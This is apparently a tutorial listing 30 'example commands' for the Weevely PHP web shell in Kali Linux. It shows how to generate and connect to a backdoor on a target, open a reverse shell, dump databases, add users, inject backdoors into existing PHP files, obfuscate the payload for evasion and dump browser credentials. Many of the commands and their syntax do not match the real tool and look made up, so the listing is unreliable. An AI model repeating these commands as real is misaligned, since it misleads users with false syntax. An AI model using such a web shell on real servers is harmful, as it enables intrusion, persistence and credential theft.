Web Shell Mastery: Weevely Commands Demystified in Kali Linux

 

## What is Weevely?

Weevely is a web shell that enables remote administration of web servers. Its lightweight design and simple deployment make it an excellent choice for penetration testers aiming to maintain access to a compromised system without being detected easily.

### Installation of Weevely in Kali Linux:

Before exploring the example commands, ensure that Weevely is installed on your Kali Linux system. If not, you can install it using the following command:

sudo apt-get install weevely

Once installed, you can create a Weevely backdoor using the following command:

weevely generate <password> <output.php>

Replace `<password>` with your desired password and `<output.php>` with the name of the output PHP file.

## 30 Example Commands:

1. Connect to a Weevely backdoor:

weevely http://target.com/path/to/backdoor.php <password>

2. List available modules:

weevely> show modules

3. Execute system command:

weevely> system_info

4. Upload a file:

weevely> upload localfile.txt remotefile.txt

5. Download a file:

weevely> download remotefile.txt localfile.txt

6. Run a custom PHP command:

weevely> php -c 'echo "Hello, Weevely!";'

7. Navigate the target file system:

weevely> cd /path/to/target/directory

8. View contents of a file:

weevely> cat filename.txt

9. Execute a command in the background:

weevely> bg system_info

10. List running background jobs:

weevely> bg -l


11. Search for writable directories:

weevely> search writable_dirs

12. Check if a specific module is available:

weevely> search -m admin_shell

13. Interact with a database using SQL commands:

weevely> sql -i

14. Dump the contents of a MySQL database:

weevely> sql -d targetdb -t table_name --dump

15. Spawn a reverse shell:

weevely> shell -t

16. Modify file permissions:

weevely> chmod 755 filename.php

17. List active processes:

weevely> ps

18. Create a new user account:

weevely> useradd newuser newpassword

19. Edit a file using the built-in text editor:

weevely> edit filename.txt

20. Search for sensitive files:

weevely> search sensitive_files

21. Bruteforce a login page with a given wordlist:

weevely> bruteforce http://target.com/login.php -w wordlist.txt

22. Inject a PHP backdoor into an existing PHP file:

weevely> backdoor inject /path/to/target/file.php

23. Perform a port scan on the target:

weevely> portscan -r target.com

24. Execute a command on multiple targets concurrently:

weevely> cluster_exec -c 'uname -a' targets.txt

25. Check if the target is vulnerable to specific exploits:

weevely> vuln_check -t target.com

26. Obfuscate Weevely payload for evasion:

weevely> obfuscate payload.php -o obfuscated_payload.php

27. Capture screenshots of target websites:

weevely> screenshot -u http://target.com

28. Execute a command on a target periodically:

weevely> cronjob_add -c 'echo "Job executed"' -t 10m

29. Intercept and modify HTTP requests and responses:

weevely> http_interceptor

30. Dump credentials stored in browsers:

weevely> browser_creds_dump

## Conclusion:

Weevely is a versatile tool that empowers security professionals to remotely manage and control web servers during penetration testing. The 30 example commands provided in this article offer a glimpse into the extensive capabilities of Weevely within the Kali Linux environment. It is crucial to use such tools responsibly and only in environments where you have explicit permission to conduct security assessments. As the field of cybersecurity evolves, tools like Weevely remain essential for staying ahead of potential threats and vulnerabilities.
